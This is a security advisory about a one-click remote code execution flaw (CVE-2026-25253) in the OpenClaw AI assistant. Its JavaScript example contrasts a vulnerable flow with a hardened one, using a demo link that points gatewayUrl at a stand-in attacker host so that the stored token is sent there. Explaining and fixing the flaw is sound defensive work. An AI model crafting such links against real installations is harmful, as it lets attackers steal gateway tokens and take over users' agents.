Critical OpenClaw Vulnerability Enables Remote Code Execution; Users Urged to Update Immediately

Critical OpenClaw Vulnerability Allows One-Click Remote Code Execution

A significant security vulnerability has been identified in OpenClaw, an open-source autonomous AI personal assistant, which could permit remote code execution (RCE) through a single malicious link. This flaw, designated as CVE-2026-25253 with a CVSS score of 8.8, has been rectified in version 2026.1.29, released on January 30, 2026.

OpenClaw, previously known as Clawdbot and Moltbot, operates locally on user devices and integrates with various messaging platforms. Since its initial release in November 2025, it has rapidly gained popularity, amassing over 149,000 stars on its GitHub repository. The platform emphasizes user control, allowing deployment on personal infrastructure such as laptops, homelabs, or virtual private servers, ensuring that users retain ownership of their data and keys.

The vulnerability arises from the Control UI’s handling of the `gatewayUrl` query-string parameter, which it accepts without validation. On load, the UI automatically opens a WebSocket to whatever gateway address that parameter names and sends the stored gateway token in the connection payload. An attacker can therefore craft a link or web page that points `gatewayUrl` at a server under the attacker’s control; when the victim opens it, the token is exfiltrated to that server. Holding the token, the attacker can connect to the victim’s local gateway, modify its configuration and execute privileged actions, which amounts to remote code execution from a single click.
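The flawed flow beside a hardened one, as an added example in JavaScript. This is not OpenClaw’s code: the function names, the default gateway port 18789, the loopback allowlist and the shape of the connect payload are assumptions made for illustration.

```javascript
// Added illustration, not OpenClaw's code. Function names, the default port
// 18789 and the connect-payload shape are assumptions for this example.

const LOOPBACK_HOSTS = new Set(["localhost", "127.0.0.1", "[::1]"]);

// Vulnerable pattern: trust gatewayUrl from the query string as-is.
function pickGatewayUrlUnsafe(search) {
  const requested = new URLSearchParams(search).get("gatewayUrl");
  return { action: "connect", url: requested || "ws://127.0.0.1:18789/" };
}

// Hardened pattern: honour gatewayUrl only when it points at loopback or at
// the host the UI itself was served from, and never downgrade the scheme.
function pickGatewayUrlSafe(search, pageOrigin) {
  const page = new URL(pageOrigin);
  const requested = new URLSearchParams(search).get("gatewayUrl");
  if (requested === null) {
    // No override: derive the gateway address from the page's own origin.
    page.protocol = page.protocol === "https:" ? "wss:" : "ws:";
    return { action: "connect", url: page.href };
  }
  let url;
  try {
    url = new URL(requested);
  } catch {
    return { action: "refuse", reason: "unparseable gatewayUrl" };
  }
  if (url.protocol !== "ws:" && url.protocol !== "wss:") {
    return { action: "refuse", reason: "not a WebSocket URL" };
  }
  // URL.hostname keeps the brackets on IPv6 literals, hence "[::1]" above.
  if (!LOOPBACK_HOSTS.has(url.hostname) && url.hostname !== page.hostname) {
    return { action: "refuse", reason: "gateway host is neither loopback nor the UI's own host" };
  }
  if (page.protocol === "https:" && url.protocol !== "wss:") {
    return { action: "refuse", reason: "plaintext gateway from an https page" };
  }
  return { action: "connect", url: url.href };
}

// Auto-connect step shared by both flows. `openSocket` stands in for
// `new WebSocket(url)` and returns an object with send(). The stored gateway
// token goes out in the first frame, so whoever controls `url` receives it.
function autoConnect(decision, storedToken, openSocket) {
  if (decision.action !== "connect") {
    return { sentTo: null, payload: null, reason: decision.reason };
  }
  const socket = openSocket(decision.url);
  const payload = JSON.stringify({ type: "connect", token: storedToken }); // assumed shape
  socket.send(payload);
  return { sentTo: decision.url, payload, reason: null };
}

// Walk one malicious link through both flows. Link, page origin and token
// are constructed for this example; the token is not a real credential.
function demo() {
  const maliciousSearch = "?gatewayUrl=wss://attacker.example/collect";
  const pageOrigin = "http://localhost:18789";
  const token = "gw_token_EXAMPLE";
  const log = [];
  const openSocket = (url) => ({ send: (frame) => log.push({ url, frame }) });

  const unsafe = autoConnect(pickGatewayUrlUnsafe(maliciousSearch), token, openSocket);
  const safe = autoConnect(pickGatewayUrlSafe(maliciousSearch, pageOrigin), token, openSocket);
  return { unsafe, safe, log };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

In the unsafe flow the token frame is sent to `attacker.example`; in the hardened flow no socket is opened at all. The check compares the parsed hostname rather than doing a string prefix match, so lookalike hosts such as `localhost.attacker.example` are refused along with anything that is not a `ws:`/`wss:` URL.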

Security researcher Mav Levin, who discovered the flaw, demonstrated that the exploit completes within milliseconds of a victim visiting a malicious web page. The attack is a form of cross-site WebSocket hijacking: in affected versions, OpenClaw’s server does not validate the `Origin` header on the WebSocket handshake, so it accepts connections initiated by any website. Because the connection is made by the victim’s own browser, running on the same machine as the gateway, binding the gateway to localhost does not stop it.

In response to this vulnerability, OpenClaw’s creator, Peter Steinberger, has released an advisory detailing the issue and the steps taken to address it. Users are strongly advised to update to version 2026.1.29 to mitigate this security risk.